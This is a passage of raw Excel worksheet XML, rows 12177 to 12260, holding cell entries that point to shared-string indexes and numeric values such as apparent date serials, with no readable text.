      <c r="C12177" t="s">
        <v>1348</v>
      </c>
      <c r="D12177" t="s">
        <v>17479</v>
      </c>
      <c r="E12177" t="s">
        <v>14162</v>
      </c>
      <c r="F12177" t="s">
        <v>14163</v>
      </c>
      <c r="G12177">
        <v>39526</v>
      </c>
      <c r="H12177">
        <v>42039</v>
      </c>
    </row>
    <row r="12178" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12178" t="s">
        <v>17480</v>
      </c>
      <c r="D12178" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12179" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12179" t="s">
        <v>17481</v>
      </c>
      <c r="B12179">
        <v>15740</v>
      </c>
      <c r="C12179" t="s">
        <v>1345</v>
      </c>
      <c r="D12179" t="s">
        <v>17482</v>
      </c>
      <c r="E12179" t="s">
        <v>17483</v>
      </c>
      <c r="F12179" t="s">
        <v>17483</v>
      </c>
      <c r="G12179" t="s">
        <v>3253</v>
      </c>
      <c r="L12179" t="s">
        <v>17484</v>
      </c>
    </row>
    <row r="12180" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12180" t="s">
        <v>17481</v>
      </c>
      <c r="B12180">
        <v>15740</v>
      </c>
      <c r="C12180" t="s">
        <v>1348</v>
      </c>
      <c r="D12180" t="s">
        <v>17482</v>
      </c>
      <c r="E12180" t="s">
        <v>17483</v>
      </c>
      <c r="F12180" t="s">
        <v>17483</v>
      </c>
      <c r="G12180" t="s">
        <v>3253</v>
      </c>
      <c r="L12180" t="s">
        <v>17484</v>
      </c>
    </row>
    <row r="12181" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12181" t="s">
        <v>17485</v>
      </c>
      <c r="D12181" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12182" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12182">
        <v>15998</v>
      </c>
      <c r="C12182" t="s">
        <v>1345</v>
      </c>
      <c r="D12182" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12183" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12183" t="s">
        <v>17486</v>
      </c>
      <c r="B12183">
        <v>15998</v>
      </c>
      <c r="C12183" t="s">
        <v>1348</v>
      </c>
      <c r="D12183" t="s">
        <v>17487</v>
      </c>
      <c r="E12183" t="s">
        <v>17488</v>
      </c>
      <c r="F12183" t="s">
        <v>17488</v>
      </c>
      <c r="G12183">
        <v>40457</v>
      </c>
    </row>
    <row r="12184" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12184" t="s">
        <v>17489</v>
      </c>
      <c r="B12184">
        <v>15999</v>
      </c>
      <c r="C12184" t="s">
        <v>1345</v>
      </c>
      <c r="D12184" t="s">
        <v>17490</v>
      </c>
      <c r="E12184" t="s">
        <v>17491</v>
      </c>
      <c r="F12184" t="s">
        <v>17491</v>
      </c>
      <c r="G12184">
        <v>40457</v>
      </c>
    </row>
    <row r="12185" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12185">
        <v>15999</v>
      </c>
      <c r="C12185" t="s">
        <v>1348</v>
      </c>
      <c r="D12185" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12186" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12186" t="s">
        <v>17492</v>
      </c>
      <c r="B12186">
        <v>16000</v>
      </c>
      <c r="C12186" t="s">
        <v>1345</v>
      </c>
      <c r="D12186" t="s">
        <v>17493</v>
      </c>
      <c r="E12186" t="s">
        <v>17494</v>
      </c>
      <c r="F12186" t="s">
        <v>17494</v>
      </c>
      <c r="G12186">
        <v>40457</v>
      </c>
      <c r="K12186" t="s">
        <v>17495</v>
      </c>
    </row>
    <row r="12187" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12187">
        <v>16000</v>
      </c>
      <c r="C12187" t="s">
        <v>1348</v>
      </c>
      <c r="D12187" t="s">
        <v>1346</v>
      </c>
      <c r="K12187" t="s">
        <v>17495</v>
      </c>
    </row>
    <row r="12188" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12188" t="s">
        <v>17496</v>
      </c>
      <c r="B12188">
        <v>16001</v>
      </c>
      <c r="C12188" t="s">
        <v>1345</v>
      </c>
      <c r="D12188" t="s">
        <v>17497</v>
      </c>
      <c r="E12188" t="s">
        <v>17494</v>
      </c>
      <c r="F12188" t="s">
        <v>17494</v>
      </c>
      <c r="G12188">
        <v>40457</v>
      </c>
    </row>
    <row r="12189" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12189">
        <v>16001</v>
      </c>
      <c r="C12189" t="s">
        <v>1348</v>
      </c>
      <c r="D12189" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12190" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A12190" t="s">
        <v>17498</v>
      </c>
      <c r="B12190">
        <v>16002</v>
      </c>
      <c r="C12190" t="s">
        <v>1345</v>
      </c>
      <c r="D12190" t="s">
        <v>17499</v>
      </c>
      <c r="E12190" t="s">
        <v>17500</v>
      </c>
      <c r="F12190" t="s">
        <v>17500</v>
      </c>
      <c r="G12190">
        <v>40457</v>
      </c>
    </row>
    <row r="12191" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12191">
        <v>16002</v>
      </c>
      <c r="C12191" t="s">
        <v>1348</v>
      </c>
      <c r="D12191" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12192" spans="1:12" x14ac:dyDescent="0.25">
      <c r="B12192">
        <v>16003</v>
      </c>
      <c r="C12192" t="s">
        <v>1345</v>
      </c>
      <c r="D12192" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12193" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12193" t="s">
        <v>17501</v>
      </c>
      <c r="B12193">
        <v>16003</v>
      </c>
      <c r="C12193" t="s">
        <v>1348</v>
      </c>
      <c r="D12193" t="s">
        <v>17502</v>
      </c>
      <c r="E12193" t="s">
        <v>17503</v>
      </c>
      <c r="F12193" t="s">
        <v>17503</v>
      </c>
      <c r="G12193">
        <v>40457</v>
      </c>
    </row>
    <row r="12194" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12194" t="s">
        <v>17504</v>
      </c>
      <c r="D12194" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12195" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12195" t="s">
        <v>17505</v>
      </c>
      <c r="B12195">
        <v>16020</v>
      </c>
      <c r="C12195" t="s">
        <v>1345</v>
      </c>
      <c r="D12195" t="s">
        <v>17506</v>
      </c>
      <c r="E12195" t="s">
        <v>17507</v>
      </c>
      <c r="F12195" t="s">
        <v>17507</v>
      </c>
      <c r="G12195">
        <v>40310</v>
      </c>
    </row>
    <row r="12196" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12196">
        <v>16020</v>
      </c>
      <c r="C12196" t="s">
        <v>1348</v>
      </c>
      <c r="D12196" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12197" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12197" t="s">
        <v>17508</v>
      </c>
      <c r="B12197">
        <v>16021</v>
      </c>
      <c r="C12197" t="s">
        <v>1345</v>
      </c>
      <c r="D12197" t="s">
        <v>17509</v>
      </c>
      <c r="E12197" t="s">
        <v>17507</v>
      </c>
      <c r="F12197" t="s">
        <v>17507</v>
      </c>
      <c r="G12197">
        <v>40310</v>
      </c>
    </row>
    <row r="12198" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12198">
        <v>16021</v>
      </c>
      <c r="C12198" t="s">
        <v>1348</v>
      </c>
      <c r="D12198" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12199" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12199" t="s">
        <v>17510</v>
      </c>
      <c r="D12199" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12200" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12200" t="s">
        <v>17511</v>
      </c>
      <c r="B12200">
        <v>16161</v>
      </c>
      <c r="C12200" t="s">
        <v>1345</v>
      </c>
      <c r="D12200" t="s">
        <v>17512</v>
      </c>
      <c r="E12200" t="s">
        <v>17513</v>
      </c>
      <c r="F12200" t="s">
        <v>17513</v>
      </c>
      <c r="G12200" t="s">
        <v>10791</v>
      </c>
    </row>
    <row r="12201" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12201" t="s">
        <v>17511</v>
      </c>
      <c r="B12201">
        <v>16161</v>
      </c>
      <c r="C12201" t="s">
        <v>1348</v>
      </c>
      <c r="D12201" t="s">
        <v>17512</v>
      </c>
      <c r="E12201" t="s">
        <v>17513</v>
      </c>
      <c r="F12201" t="s">
        <v>17513</v>
      </c>
      <c r="G12201" t="s">
        <v>10791</v>
      </c>
    </row>
    <row r="12202" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12202" t="s">
        <v>17514</v>
      </c>
      <c r="B12202">
        <v>16162</v>
      </c>
      <c r="C12202" t="s">
        <v>1345</v>
      </c>
      <c r="D12202" t="s">
        <v>17515</v>
      </c>
      <c r="E12202" t="s">
        <v>17516</v>
      </c>
      <c r="F12202" t="s">
        <v>17516</v>
      </c>
      <c r="G12202">
        <v>39940</v>
      </c>
    </row>
    <row r="12203" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12203">
        <v>16162</v>
      </c>
      <c r="C12203" t="s">
        <v>1348</v>
      </c>
      <c r="D12203" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12204" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12204" t="s">
        <v>17517</v>
      </c>
      <c r="D12204" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12205" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12205" t="s">
        <v>17518</v>
      </c>
      <c r="B12205">
        <v>16309</v>
      </c>
      <c r="C12205" t="s">
        <v>1345</v>
      </c>
      <c r="D12205" t="s">
        <v>17518</v>
      </c>
      <c r="E12205" t="s">
        <v>17519</v>
      </c>
      <c r="F12205" t="s">
        <v>17519</v>
      </c>
      <c r="G12205" t="s">
        <v>3253</v>
      </c>
    </row>
    <row r="12206" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12206" t="s">
        <v>17518</v>
      </c>
      <c r="B12206">
        <v>16309</v>
      </c>
      <c r="C12206" t="s">
        <v>1348</v>
      </c>
      <c r="D12206" t="s">
        <v>17518</v>
      </c>
      <c r="E12206" t="s">
        <v>17519</v>
      </c>
      <c r="F12206" t="s">
        <v>17519</v>
      </c>
      <c r="G12206" t="s">
        <v>3253</v>
      </c>
    </row>
    <row r="12207" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12207" t="s">
        <v>17520</v>
      </c>
      <c r="B12207">
        <v>16310</v>
      </c>
      <c r="C12207" t="s">
        <v>1345</v>
      </c>
      <c r="D12207" t="s">
        <v>17521</v>
      </c>
      <c r="E12207" t="s">
        <v>17522</v>
      </c>
      <c r="F12207" t="s">
        <v>17522</v>
      </c>
      <c r="G12207" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12208" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12208" t="s">
        <v>17520</v>
      </c>
      <c r="B12208">
        <v>16310</v>
      </c>
      <c r="C12208" t="s">
        <v>1348</v>
      </c>
      <c r="D12208" t="s">
        <v>17521</v>
      </c>
      <c r="E12208" t="s">
        <v>17522</v>
      </c>
      <c r="F12208" t="s">
        <v>17522</v>
      </c>
      <c r="G12208" t="s">
        <v>6391</v>
      </c>
    </row>
    <row r="12209" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12209" t="s">
        <v>17523</v>
      </c>
      <c r="B12209">
        <v>16311</v>
      </c>
      <c r="C12209" t="s">
        <v>1345</v>
      </c>
      <c r="D12209" t="s">
        <v>17524</v>
      </c>
      <c r="E12209" t="s">
        <v>17522</v>
      </c>
      <c r="F12209" t="s">
        <v>17522</v>
      </c>
      <c r="G12209" t="s">
        <v>11609</v>
      </c>
    </row>
    <row r="12210" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12210" t="s">
        <v>17523</v>
      </c>
      <c r="B12210">
        <v>16311</v>
      </c>
      <c r="C12210" t="s">
        <v>1348</v>
      </c>
      <c r="D12210" t="s">
        <v>17524</v>
      </c>
      <c r="E12210" t="s">
        <v>17522</v>
      </c>
      <c r="F12210" t="s">
        <v>17522</v>
      </c>
      <c r="G12210" t="s">
        <v>11609</v>
      </c>
    </row>
    <row r="12211" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12211" t="s">
        <v>17525</v>
      </c>
      <c r="D12211" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12212" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12212" t="s">
        <v>17526</v>
      </c>
      <c r="B12212">
        <v>16360</v>
      </c>
      <c r="C12212" t="s">
        <v>1345</v>
      </c>
      <c r="D12212" t="s">
        <v>17527</v>
      </c>
      <c r="E12212" t="s">
        <v>17528</v>
      </c>
      <c r="F12212" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12213" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12213" t="s">
        <v>17526</v>
      </c>
      <c r="B12213">
        <v>16360</v>
      </c>
      <c r="C12213" t="s">
        <v>1348</v>
      </c>
      <c r="D12213" t="s">
        <v>17527</v>
      </c>
      <c r="E12213" t="s">
        <v>17528</v>
      </c>
      <c r="F12213" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12214" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12214" t="s">
        <v>17529</v>
      </c>
      <c r="B12214">
        <v>16361</v>
      </c>
      <c r="C12214" t="s">
        <v>1345</v>
      </c>
      <c r="D12214" t="s">
        <v>17530</v>
      </c>
      <c r="E12214" t="s">
        <v>17528</v>
      </c>
      <c r="F12214" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12215" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12215" t="s">
        <v>17529</v>
      </c>
      <c r="B12215">
        <v>16361</v>
      </c>
      <c r="C12215" t="s">
        <v>1348</v>
      </c>
      <c r="D12215" t="s">
        <v>17530</v>
      </c>
      <c r="E12215" t="s">
        <v>17528</v>
      </c>
      <c r="F12215" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12216" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12216" t="s">
        <v>17531</v>
      </c>
      <c r="D12216" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12217" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12217" t="s">
        <v>17532</v>
      </c>
      <c r="B12217">
        <v>16367</v>
      </c>
      <c r="C12217" t="s">
        <v>1345</v>
      </c>
      <c r="D12217" t="s">
        <v>17533</v>
      </c>
      <c r="E12217" t="s">
        <v>17528</v>
      </c>
      <c r="F12217" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12218" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12218" t="s">
        <v>17532</v>
      </c>
      <c r="B12218">
        <v>16367</v>
      </c>
      <c r="C12218" t="s">
        <v>1348</v>
      </c>
      <c r="D12218" t="s">
        <v>17533</v>
      </c>
      <c r="E12218" t="s">
        <v>17528</v>
      </c>
      <c r="F12218" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12219" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12219" t="s">
        <v>17534</v>
      </c>
      <c r="B12219">
        <v>16368</v>
      </c>
      <c r="C12219" t="s">
        <v>1345</v>
      </c>
      <c r="D12219" t="s">
        <v>17535</v>
      </c>
      <c r="E12219" t="s">
        <v>17528</v>
      </c>
      <c r="F12219" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12220" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12220" t="s">
        <v>17534</v>
      </c>
      <c r="B12220">
        <v>16368</v>
      </c>
      <c r="C12220" t="s">
        <v>1348</v>
      </c>
      <c r="D12220" t="s">
        <v>17535</v>
      </c>
      <c r="E12220" t="s">
        <v>17528</v>
      </c>
      <c r="F12220" t="s">
        <v>17528</v>
      </c>
    </row>
    <row r="12221" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12221" t="s">
        <v>17536</v>
      </c>
      <c r="D12221" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12222" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12222" t="s">
        <v>17537</v>
      </c>
      <c r="B12222">
        <v>16384</v>
      </c>
      <c r="C12222" t="s">
        <v>1345</v>
      </c>
      <c r="D12222" t="s">
        <v>17538</v>
      </c>
      <c r="E12222" t="s">
        <v>17539</v>
      </c>
      <c r="F12222" t="s">
        <v>17539</v>
      </c>
      <c r="G12222" t="s">
        <v>3249</v>
      </c>
    </row>
    <row r="12223" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12223" t="s">
        <v>17537</v>
      </c>
      <c r="B12223">
        <v>16384</v>
      </c>
      <c r="C12223" t="s">
        <v>1348</v>
      </c>
      <c r="D12223" t="s">
        <v>17538</v>
      </c>
      <c r="E12223" t="s">
        <v>17539</v>
      </c>
      <c r="F12223" t="s">
        <v>17539</v>
      </c>
      <c r="G12223" t="s">
        <v>3249</v>
      </c>
    </row>
    <row r="12224" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12224" t="s">
        <v>17540</v>
      </c>
      <c r="B12224">
        <v>16385</v>
      </c>
      <c r="C12224" t="s">
        <v>1345</v>
      </c>
      <c r="D12224" t="s">
        <v>17541</v>
      </c>
      <c r="E12224" t="s">
        <v>17542</v>
      </c>
      <c r="F12224" t="s">
        <v>17543</v>
      </c>
      <c r="G12224">
        <v>42124</v>
      </c>
    </row>
    <row r="12225" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12225">
        <v>16385</v>
      </c>
      <c r="C12225" t="s">
        <v>1348</v>
      </c>
      <c r="D12225" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12226" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12226" t="s">
        <v>17544</v>
      </c>
      <c r="D12226" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12227" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12227" t="s">
        <v>17545</v>
      </c>
      <c r="B12227">
        <v>16619</v>
      </c>
      <c r="C12227" t="s">
        <v>1345</v>
      </c>
      <c r="D12227" t="s">
        <v>17546</v>
      </c>
      <c r="E12227" t="s">
        <v>17547</v>
      </c>
      <c r="F12227" t="s">
        <v>17547</v>
      </c>
      <c r="G12227">
        <v>39699</v>
      </c>
    </row>
    <row r="12228" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12228">
        <v>16619</v>
      </c>
      <c r="C12228" t="s">
        <v>1348</v>
      </c>
      <c r="D12228" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12229" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12229" t="s">
        <v>17548</v>
      </c>
      <c r="D12229" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12230" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12230" t="s">
        <v>17549</v>
      </c>
      <c r="B12230">
        <v>16665</v>
      </c>
      <c r="C12230" t="s">
        <v>1345</v>
      </c>
      <c r="D12230" t="s">
        <v>17550</v>
      </c>
      <c r="E12230" t="s">
        <v>17551</v>
      </c>
      <c r="F12230" t="s">
        <v>17552</v>
      </c>
      <c r="G12230">
        <v>41908</v>
      </c>
    </row>
    <row r="12231" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12231">
        <v>16665</v>
      </c>
      <c r="C12231" t="s">
        <v>1348</v>
      </c>
      <c r="D12231" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12232" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12232">
        <v>16666</v>
      </c>
      <c r="C12232" t="s">
        <v>1345</v>
      </c>
      <c r="D12232" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12233" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12233" t="s">
        <v>17553</v>
      </c>
      <c r="B12233">
        <v>16666</v>
      </c>
      <c r="C12233" t="s">
        <v>1348</v>
      </c>
      <c r="D12233" t="s">
        <v>17554</v>
      </c>
      <c r="E12233" t="s">
        <v>17555</v>
      </c>
      <c r="F12233" t="s">
        <v>17556</v>
      </c>
      <c r="G12233">
        <v>40840</v>
      </c>
    </row>
    <row r="12234" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12234" t="s">
        <v>17557</v>
      </c>
      <c r="D12234" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12235" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12235" t="s">
        <v>17558</v>
      </c>
      <c r="B12235">
        <v>16789</v>
      </c>
      <c r="C12235" t="s">
        <v>1345</v>
      </c>
      <c r="D12235" t="s">
        <v>17559</v>
      </c>
      <c r="E12235" t="s">
        <v>17560</v>
      </c>
      <c r="F12235" t="s">
        <v>17561</v>
      </c>
      <c r="G12235">
        <v>42157</v>
      </c>
    </row>
    <row r="12236" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12236">
        <v>16789</v>
      </c>
      <c r="C12236" t="s">
        <v>1348</v>
      </c>
      <c r="D12236" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12237" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12237" t="s">
        <v>17562</v>
      </c>
      <c r="D12237" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12238" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12238" t="s">
        <v>17563</v>
      </c>
      <c r="B12238">
        <v>16900</v>
      </c>
      <c r="C12238" t="s">
        <v>1345</v>
      </c>
      <c r="D12238" t="s">
        <v>17564</v>
      </c>
      <c r="E12238" t="s">
        <v>17565</v>
      </c>
      <c r="F12238" t="s">
        <v>17565</v>
      </c>
      <c r="G12238">
        <v>40000</v>
      </c>
    </row>
    <row r="12239" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12239" t="s">
        <v>17563</v>
      </c>
      <c r="B12239">
        <v>16900</v>
      </c>
      <c r="C12239" t="s">
        <v>1348</v>
      </c>
      <c r="D12239" t="s">
        <v>17564</v>
      </c>
      <c r="E12239" t="s">
        <v>17565</v>
      </c>
      <c r="F12239" t="s">
        <v>17565</v>
      </c>
      <c r="G12239">
        <v>40000</v>
      </c>
    </row>
    <row r="12240" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12240" t="s">
        <v>17566</v>
      </c>
      <c r="D12240" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12241" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12241" t="s">
        <v>17567</v>
      </c>
      <c r="B12241">
        <v>16950</v>
      </c>
      <c r="C12241" t="s">
        <v>1345</v>
      </c>
      <c r="D12241" t="s">
        <v>17568</v>
      </c>
      <c r="E12241" t="s">
        <v>17569</v>
      </c>
      <c r="F12241" t="s">
        <v>17569</v>
      </c>
    </row>
    <row r="12242" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12242" t="s">
        <v>17567</v>
      </c>
      <c r="B12242">
        <v>16950</v>
      </c>
      <c r="C12242" t="s">
        <v>1348</v>
      </c>
      <c r="D12242" t="s">
        <v>17568</v>
      </c>
      <c r="E12242" t="s">
        <v>17569</v>
      </c>
      <c r="F12242" t="s">
        <v>17569</v>
      </c>
    </row>
    <row r="12243" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12243" t="s">
        <v>17570</v>
      </c>
      <c r="D12243" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12244" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12244" t="s">
        <v>17571</v>
      </c>
      <c r="B12244">
        <v>16991</v>
      </c>
      <c r="C12244" t="s">
        <v>1345</v>
      </c>
      <c r="D12244" t="s">
        <v>17572</v>
      </c>
      <c r="E12244" t="s">
        <v>17573</v>
      </c>
      <c r="F12244" t="s">
        <v>17573</v>
      </c>
    </row>
    <row r="12245" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12245" t="s">
        <v>17571</v>
      </c>
      <c r="B12245">
        <v>16991</v>
      </c>
      <c r="C12245" t="s">
        <v>1348</v>
      </c>
      <c r="D12245" t="s">
        <v>17572</v>
      </c>
      <c r="E12245" t="s">
        <v>17573</v>
      </c>
      <c r="F12245" t="s">
        <v>17573</v>
      </c>
    </row>
    <row r="12246" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12246" t="s">
        <v>17574</v>
      </c>
      <c r="B12246">
        <v>16992</v>
      </c>
      <c r="C12246" t="s">
        <v>1345</v>
      </c>
      <c r="D12246" t="s">
        <v>17575</v>
      </c>
      <c r="E12246" t="s">
        <v>17576</v>
      </c>
      <c r="F12246" t="s">
        <v>17576</v>
      </c>
      <c r="G12246" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12247" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12247" t="s">
        <v>17574</v>
      </c>
      <c r="B12247">
        <v>16992</v>
      </c>
      <c r="C12247" t="s">
        <v>1348</v>
      </c>
      <c r="D12247" t="s">
        <v>17575</v>
      </c>
      <c r="E12247" t="s">
        <v>17576</v>
      </c>
      <c r="F12247" t="s">
        <v>17576</v>
      </c>
      <c r="G12247" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12248" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12248" t="s">
        <v>17577</v>
      </c>
      <c r="B12248">
        <v>16993</v>
      </c>
      <c r="C12248" t="s">
        <v>1345</v>
      </c>
      <c r="D12248" t="s">
        <v>17578</v>
      </c>
      <c r="E12248" t="s">
        <v>17576</v>
      </c>
      <c r="F12248" t="s">
        <v>17576</v>
      </c>
      <c r="G12248" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12249" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12249" t="s">
        <v>17577</v>
      </c>
      <c r="B12249">
        <v>16993</v>
      </c>
      <c r="C12249" t="s">
        <v>1348</v>
      </c>
      <c r="D12249" t="s">
        <v>17578</v>
      </c>
      <c r="E12249" t="s">
        <v>17576</v>
      </c>
      <c r="F12249" t="s">
        <v>17576</v>
      </c>
      <c r="G12249" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12250" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12250" t="s">
        <v>17579</v>
      </c>
      <c r="B12250">
        <v>16994</v>
      </c>
      <c r="C12250" t="s">
        <v>1345</v>
      </c>
      <c r="D12250" t="s">
        <v>17580</v>
      </c>
      <c r="E12250" t="s">
        <v>17581</v>
      </c>
      <c r="F12250" t="s">
        <v>17581</v>
      </c>
      <c r="G12250" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12251" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12251" t="s">
        <v>17579</v>
      </c>
      <c r="B12251">
        <v>16994</v>
      </c>
      <c r="C12251" t="s">
        <v>1348</v>
      </c>
      <c r="D12251" t="s">
        <v>17580</v>
      </c>
      <c r="E12251" t="s">
        <v>17581</v>
      </c>
      <c r="F12251" t="s">
        <v>17581</v>
      </c>
      <c r="G12251" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12252" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12252" t="s">
        <v>17582</v>
      </c>
      <c r="B12252">
        <v>16995</v>
      </c>
      <c r="C12252" t="s">
        <v>1345</v>
      </c>
      <c r="D12252" t="s">
        <v>17583</v>
      </c>
      <c r="E12252" t="s">
        <v>17581</v>
      </c>
      <c r="F12252" t="s">
        <v>17581</v>
      </c>
      <c r="G12252" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12253" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12253" t="s">
        <v>17582</v>
      </c>
      <c r="B12253">
        <v>16995</v>
      </c>
      <c r="C12253" t="s">
        <v>1348</v>
      </c>
      <c r="D12253" t="s">
        <v>17583</v>
      </c>
      <c r="E12253" t="s">
        <v>17581</v>
      </c>
      <c r="F12253" t="s">
        <v>17581</v>
      </c>
      <c r="G12253" t="s">
        <v>5916</v>
      </c>
    </row>
    <row r="12254" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12254" t="s">
        <v>17584</v>
      </c>
      <c r="D12254" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12255" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12255" t="s">
        <v>17585</v>
      </c>
      <c r="B12255">
        <v>17007</v>
      </c>
      <c r="C12255" t="s">
        <v>1345</v>
      </c>
    </row>
    <row r="12256" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12256" t="s">
        <v>17585</v>
      </c>
      <c r="B12256">
        <v>17007</v>
      </c>
      <c r="C12256" t="s">
        <v>1348</v>
      </c>
    </row>
    <row r="12257" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12257" t="s">
        <v>17586</v>
      </c>
      <c r="D12257" t="s">
        <v>1356</v>
      </c>
    </row>
    <row r="12258" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12258" t="s">
        <v>17587</v>
      </c>
      <c r="B12258">
        <v>17184</v>
      </c>
      <c r="C12258" t="s">
        <v>1345</v>
      </c>
      <c r="D12258" t="s">
        <v>17588</v>
      </c>
      <c r="E12258" t="s">
        <v>17589</v>
      </c>
      <c r="F12258" t="s">
        <v>17590</v>
      </c>
      <c r="G12258">
        <v>41577</v>
      </c>
    </row>
    <row r="12259" spans="1:7" x14ac:dyDescent="0.25">
      <c r="B12259">
        <v>17184</v>
      </c>
      <c r="C12259" t="s">
        <v>1348</v>
      </c>
      <c r="D12259" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="12260" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12260" t="s">
        <v>17591</v>
      </c>
      <c r="B12260">
        <v>17185</v>
      </c>
